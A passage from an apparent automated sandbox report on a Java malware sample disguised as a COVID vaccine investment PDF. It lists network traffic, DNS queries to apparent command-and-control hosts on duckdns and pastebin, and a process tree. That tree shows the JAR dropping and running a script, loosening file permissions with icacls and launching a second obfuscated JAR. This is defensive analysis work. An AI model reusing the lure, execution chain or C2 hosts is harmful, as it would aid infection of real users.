                                                                                                                                          Feb 23, 2021 21:04:23.091814995 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091825962 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.091839075 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091862917 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091873884 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.091886044 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091907978 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091933966 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091933966 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.091953039 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.091962099 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.092044115 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.094165087 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094196081 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094218969 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094244957 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094269037 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094290018 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094311953 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094312906 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.094336033 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094346046 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.094352007 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.094360113 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094382048 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.094398022 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.094443083 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.095511913 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.095537901 CET44349718199.232.192.209192.168.2.3

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Feb 23, 2021 21:04:04.787981987 CET5128153192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:04.839752913 CET53512818.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:05.738883972 CET4919953192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:05.792526960 CET53491998.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:06.778394938 CET5062053192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:06.836930990 CET53506208.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:06.930882931 CET6493853192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:06.990648985 CET53649388.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:07.752113104 CET6015253192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:07.803603888 CET53601528.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:08.780697107 CET5754453192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:08.829201937 CET53575448.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:10.061552048 CET5598453192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:10.124532938 CET53559848.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:11.242398977 CET6418553192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:11.291132927 CET53641858.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:12.172589064 CET6511053192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:12.224208117 CET53651108.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:13.587836981 CET5836153192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:13.636614084 CET53583618.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:14.620203972 CET6349253192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:14.670813084 CET53634928.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:15.954237938 CET6083153192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:16.005600929 CET53608318.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:16.926575899 CET6010053192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:16.978249073 CET53601008.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:18.195648909 CET5319553192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:18.244349957 CET53531958.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:18.986308098 CET5014153192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:19.036731958 CET53501418.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:21.187669992 CET5302353192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:21.237144947 CET53530238.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.259543896 CET4956353192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:22.312324047 CET53495638.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.646025896 CET5135253192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:22.646184921 CET5934953192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:22.706168890 CET53513528.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.710860014 CET53593498.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.130125046 CET5708453192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:23.188406944 CET53570848.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.439188957 CET5882353192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:23.488096952 CET53588238.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:24.999437094 CET5756853192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:25.079427004 CET53575688.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:42.766957998 CET5054053192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:42.782876015 CET5436653192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:42.832326889 CET53505408.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:42.840290070 CET53543668.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:50.739006996 CET5303453192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:50.826561928 CET53530348.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:50.993541956 CET5776253192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:51.047672987 CET53577628.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:51.840692043 CET5543553192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:51.897739887 CET53554358.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:52.119888067 CET5071353192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:52.171313047 CET53507138.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:52.228467941 CET5613253192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:04:52.462094069 CET53561328.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:00.102988005 CET5898753192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:00.154455900 CET53589878.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:04.293481112 CET5657953192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:04.521935940 CET53565798.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:18.343533993 CET6063353192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:18.413583994 CET53606338.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:27.343029976 CET6129253192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:27.391772985 CET53612928.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:28.235084057 CET6361953192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:28.284691095 CET53636198.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:30.140880108 CET6493853192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:30.203813076 CET53649388.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:59.069261074 CET6194653192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:59.302706003 CET53619468.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:59.311817884 CET6491053192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:59.535707951 CET53649108.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:06:01.412451982 CET5212353192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:06:01.461036921 CET53521238.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:06:02.047835112 CET5613053192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:06:02.125761986 CET53561308.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:06:35.015863895 CET5633853192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:06:35.237154007 CET53563388.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:06:51.716965914 CET5942053192.168.2.38.8.8.8

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                          Feb 23, 2021 21:04:22.646025896 CET192.168.2.38.8.8.80x1573Standard query (0)repo1.maven.orgA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:22.646184921 CET192.168.2.38.8.8.80x94c2Standard query (0)github.comA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:23.130125046 CET192.168.2.38.8.8.80x439eStandard query (0)github-releases.githubusercontent.comA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:42.782876015 CET192.168.2.38.8.8.80x2f6eStandard query (0)str-master.pwA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:50.739006996 CET192.168.2.38.8.8.80xba98Standard query (0)jbfrost.liveA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:50.993541956 CET192.168.2.38.8.8.80xd94aStandard query (0)pastebin.comA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:51.840692043 CET192.168.2.38.8.8.80x67afStandard query (0)str-master.pwA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:52.228467941 CET192.168.2.38.8.8.80x75b5Standard query (0)pluginserver.duckdns.orgA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:05:04.293481112 CET192.168.2.38.8.8.80xbd0Standard query (0)strizzz100.duckdns.orgA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:05:59.069261074 CET192.168.2.38.8.8.80x5536Standard query (0)strizzz100.duckdns.orgA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:05:59.311817884 CET192.168.2.38.8.8.80x3a23Standard query (0)pluginserver.duckdns.orgA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:06:35.015863895 CET192.168.2.38.8.8.80xd395Standard query (0)pluginserver.duckdns.orgA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:06:51.716965914 CET192.168.2.38.8.8.80x9a7eStandard query (0)strizzz100.duckdns.orgA (IP address)IN (0x0001)

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                          Feb 23, 2021 21:04:22.706168890 CET8.8.8.8192.168.2.30x1573No error (0)repo1.maven.orgsonatype.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:22.706168890 CET8.8.8.8192.168.2.30x1573No error (0)sonatype.map.fastly.net199.232.192.209A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:22.706168890 CET8.8.8.8192.168.2.30x1573No error (0)sonatype.map.fastly.net199.232.196.209A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:22.710860014 CET8.8.8.8192.168.2.30x94c2No error (0)github.com140.82.121.3A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:23.188406944 CET8.8.8.8192.168.2.30x439eNo error (0)github-releases.githubusercontent.com185.199.108.154A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:23.188406944 CET8.8.8.8192.168.2.30x439eNo error (0)github-releases.githubusercontent.com185.199.109.154A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:23.188406944 CET8.8.8.8192.168.2.30x439eNo error (0)github-releases.githubusercontent.com185.199.110.154A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:23.188406944 CET8.8.8.8192.168.2.30x439eNo error (0)github-releases.githubusercontent.com185.199.111.154A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:50.826561928 CET8.8.8.8192.168.2.30xba98Server failure (2)jbfrost.livenonenoneA (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:51.047672987 CET8.8.8.8192.168.2.30xd94aNo error (0)pastebin.com104.23.99.190A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:51.047672987 CET8.8.8.8192.168.2.30xd94aNo error (0)pastebin.com104.23.98.190A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:04:52.462094069 CET8.8.8.8192.168.2.30x75b5No error (0)pluginserver.duckdns.org23.239.31.129A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:05:04.521935940 CET8.8.8.8192.168.2.30xbd0No error (0)strizzz100.duckdns.org107.175.144.243A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:05:59.302706003 CET8.8.8.8192.168.2.30x5536No error (0)strizzz100.duckdns.org107.175.144.243A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:05:59.535707951 CET8.8.8.8192.168.2.30x3a23No error (0)pluginserver.duckdns.org23.239.31.129A (IP address)IN (0x0001)
                                                                                                                                          Feb 23, 2021 21:06:35.237154007 CET8.8.8.8192.168.2.30xd395No error (0)pluginserver.duckdns.org23.239.31.129A (IP address)IN (0x0001)

                                                                                                                                          HTTPS Packets

                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                          Feb 23, 2021 21:04:22.865737915 CET140.82.121.3443192.168.2.349721CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue May 05 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Tue May 10 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0d2935c58fe676744fecc8614ee5356c7
                                                                                                                                          CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                          Feb 23, 2021 21:04:22.868626118 CET199.232.192.209443192.168.2.349719CN=repo1.maven.org, O="Sonatype, Inc", L=Fulton, ST=Maryland, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Aug 17 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Wed Sep 08 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0d2935c58fe676744fecc8614ee5356c7
                                                                                                                                          CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                          Feb 23, 2021 21:04:22.868731022 CET199.232.192.209443192.168.2.349720CN=repo1.maven.org, O="Sonatype, Inc", L=Fulton, ST=Maryland, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Aug 17 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Wed Sep 08 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0d2935c58fe676744fecc8614ee5356c7
                                                                                                                                          CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                          Feb 23, 2021 21:04:22.868848085 CET199.232.192.209443192.168.2.349718CN=repo1.maven.org, O="Sonatype, Inc", L=Fulton, ST=Maryland, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Aug 17 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Wed Sep 08 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0d2935c58fe676744fecc8614ee5356c7
                                                                                                                                          CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                          Feb 23, 2021 21:04:23.355176926 CET185.199.108.154443192.168.2.349722CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0d2935c58fe676744fecc8614ee5356c7
                                                                                                                                          CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028

                                                                                                                                          Code Manipulations

                                                                                                                                          Statistics

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          Analysis Process: cmd.exe PID: 4952 Parent PID: 5664

                                                                                                                                          General

                                                                                                                                          Start time:21:04:10
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
                                                                                                                                          Imagebase:0x7ff77d8b0000
                                                                                                                                          File size:273920 bytes
                                                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Analysis Process: 7za.exe PID: 384 Parent PID: 4952

                                                                                                                                          General

                                                                                                                                          Start time:21:04:11
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\7za.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
                                                                                                                                          Imagebase:0xb40000
                                                                                                                                          File size:289792 bytes
                                                                                                                                          MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000002.00000003.200309664.0000000002C90000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                          Reputation:high

                                                                                                                                          Analysis Process: cmd.exe PID: 4120 Parent PID: 5664

                                                                                                                                          General

                                                                                                                                          Start time:21:04:11
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:'C:\Windows\System32\cmd.exe' /c java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl >> C:\cmdlinestart.log 2>&1
                                                                                                                                          Imagebase:0x7ff77d8b0000
                                                                                                                                          File size:273920 bytes
                                                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Analysis Process: conhost.exe PID: 5708 Parent PID: 4120

                                                                                                                                          General

                                                                                                                                          Start time:21:04:12
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Analysis Process: java.exe PID: 5544 Parent PID: 4120

                                                                                                                                          General

                                                                                                                                          Start time:21:04:12
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl
                                                                                                                                          Imagebase:0xf0000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Java
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000006.00000002.207844794.0000000014D78000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                          Reputation:moderate

                                                                                                                                          Analysis Process: icacls.exe PID: 5980 Parent PID: 5544

                                                                                                                                          General

                                                                                                                                          Start time:21:04:13
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
                                                                                                                                          Imagebase:0xa80000
                                                                                                                                          File size:29696 bytes
                                                                                                                                          MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Analysis Process: conhost.exe PID: 384 Parent PID: 5980

                                                                                                                                          General

                                                                                                                                          Start time:21:04:13
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Analysis Process: wscript.exe PID: 5712 Parent PID: 5544

                                                                                                                                          General

                                                                                                                                          Start time:21:04:13
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:wscript C:\Users\user\fukvowbkrs.js
                                                                                                                                          Imagebase:0x1340000
                                                                                                                                          File size:147456 bytes
                                                                                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Analysis Process: javaw.exe PID: 3164 Parent PID: 5712

                                                                                                                                          General

                                                                                                                                          Start time:21:04:19
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0x940000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000B.00000002.238594494.0000000009FA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000B.00000002.238481797.0000000009F6E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          Reputation:moderate

                                                                                                                                          Analysis Process: java.exe PID: 720 Parent PID: 3164

                                                                                                                                          General

